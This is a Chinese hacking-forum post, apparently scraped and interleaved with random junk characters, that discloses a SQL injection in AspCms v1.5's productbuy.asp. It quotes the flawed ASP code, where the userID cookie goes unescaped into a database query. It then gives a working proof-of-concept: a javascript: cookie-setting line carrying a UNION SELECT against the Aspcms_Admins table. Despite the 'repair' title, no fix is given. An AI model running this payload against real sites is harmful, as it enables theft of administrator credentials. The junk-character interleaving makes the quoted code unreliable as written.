AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
- [* Y* ]0 J& V7 L也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
废话不多说，看代码：
* l& M% K5 \) L
<%
  ^/ i1 q2 }$ V
if action = "buy" then

$ W' M% u2 S; }% `5 _        addOrder()

& P3 u  ]$ |) R1 Y" Q$ b- Ielse

3 U( i7 @( K1 |% L' h' G9 @        echoContent()

, U$ m, B# n- r2 \; |end if


0 O5 }. R, H0 g6 @. c( E4 P
……略过
: J6 S1 l" u) B5 j; [- [3 G* `

% q# z# P2 H. X6 H( X
2 v- p0 V7 L! D+ `$ nSub echoContent()
3 Q: d) |7 v) l& O% w# f" [  L. t
        dim id

' l: x9 o! E. A* o, A& Q$ G/ M        id=getForm("id","get")
$ e7 f5 ]' T& f+ V
        
/ x$ `1 {  {* k' o) F4 P& T
# y7 w& y8 ], W* q( R" S/ P# }2 ?        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"
$ M4 ]# V) L9 Q
        
. R$ ^( v/ l) P9 l- ]: n- D# C8 k3 E
        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
, e! H6 V& Z" w  m9 t, o6 N: s
& B- p/ ?/ ?, s1 U+ Q7 L  |        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

        Dim templatePath,tempStr
# s4 J) V0 \! T8 X: l  j( H9 P
        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
9 q$ a) Z- d/ Y, g- Q
" l5 ]8 }0 U+ ~, Y
0 P, M2 l- y6 V
2 y+ z( D8 O3 x! r        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")

        selectproduct=rsObj(0)
8 ]3 g5 U3 Z) ~
        
% b7 U1 w2 r$ U  v( V; _7 w
        Dim linkman,gender,phone,mobile,email,qq,address,postcode

6 O$ {+ Q+ G/ Q/ C; [" g7 I' K& h        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

8 P" Q5 r: x$ ~        if rCookie("loginstatus")=1 then  
$ M' T6 h' e: R& b
; p. G5 b* r- u" W+ v+ G# }                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
' T/ E) s( M4 z0 j; a# m4 T4 ~- M
                linkman=rsObj("truename")
. Z, u1 Z. @5 m, m$ ]" I
/ v# X4 }6 K! _9 |4 K9 _                gender=rsObj("gender")

9 X, o& q2 ^4 a" b& k! Q                phone=rsObj("phone")
' y* P+ r; b0 ]5 R3 v8 |8 Z1 s8 ?
$ N  ?/ a( W7 S0 ~- J5 ^                mobile=rsObj("mobile")
$ P$ i  d; E. }
; S8 o" Z- l  }2 f; S+ n! {                email=rsObj("email")
6 d9 i) W9 Q( x- Z
! K& }/ U% G: f4 E; N2 A! a                qq=rsObj("qq")
9 S. n9 l7 V0 \) D% b# k/ c
                address=rsObj("address")

                postcode=rsObj("postcode")
  E7 S4 j5 \1 ]) i! r& x
0 M/ S, c, x  R- l- \        else
0 y" ]5 e/ k$ }  o6 f. w
                gender=1

        end if

        rsObj.close()

4 U; b7 I) d0 R! I+ c8 W7 O* Y               
: `- S: V# m% I4 v
        with templateObj
5 a$ E0 y5 ?( f8 ^# I$ }
                .content=loadFile(templatePath)        
0 v* K! f; U  N+ N  I/ q
                .parseHtml()
) [- y; i6 P0 p# n+ c9 t5 |
; s2 a' f" t8 x8 t! ]' ]6 B3 {                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
9 R" C+ g* v" T1 v4 y1 b5 g
6 D7 f3 K5 i3 T, r8 f) d6 i                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               
/ ~! J" V8 W& V$ G4 N3 u
& h, |+ {5 p7 f, |  I# V                .content=replaceStr(.content,"[aspcms:gender]",gender)               
2 A  o/ C$ X& D5 l
                .content=replaceStr(.content,"[aspcms:phone]",phone)               
$ l- d# R6 L. k
                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               
$ f( ~0 e4 Z- u) S
                .content=replaceStr(.content,"[aspcms:email]",email)                        
3 d, x) U9 B2 [$ n% h% t; v  c& x' u% v
                .content=replaceStr(.content,"[aspcms:qq]",qq)                        
) G: ?' \  o1 {5 Q0 i
- B, n% A" J: t+ \2 w                .content=replaceStr(.content,"[aspcms:address]",address)                        
) I# `3 x6 R2 q" K3 H. s3 i$ ^5 ]) `/ q" A
+ h/ L2 l0 I& x                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
& u1 V# t. U% R  C9 s- W
                .parseCommon()                 

                echo .content
/ O  y" w, a9 [7 I( e6 m/ M
        end with

0 a0 z" Z) G# p        set templateobj =nothing : terminateAllObjects
+ w% h& x4 ~' X" p- J% ]+ b& ?- l
6 H1 V; t. R) O2 _4 Y& ?- m1 cEnd Sub
. @0 [" r) o: A7 R, ?) l, I漏洞很明显，没啥好说的
. S* R  d) a+ R: }% H+ d: ]poc：

- A/ S% s8 c9 F$ `, E- G9 x1 yjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​

) `0 n; G- h0 s. Z( i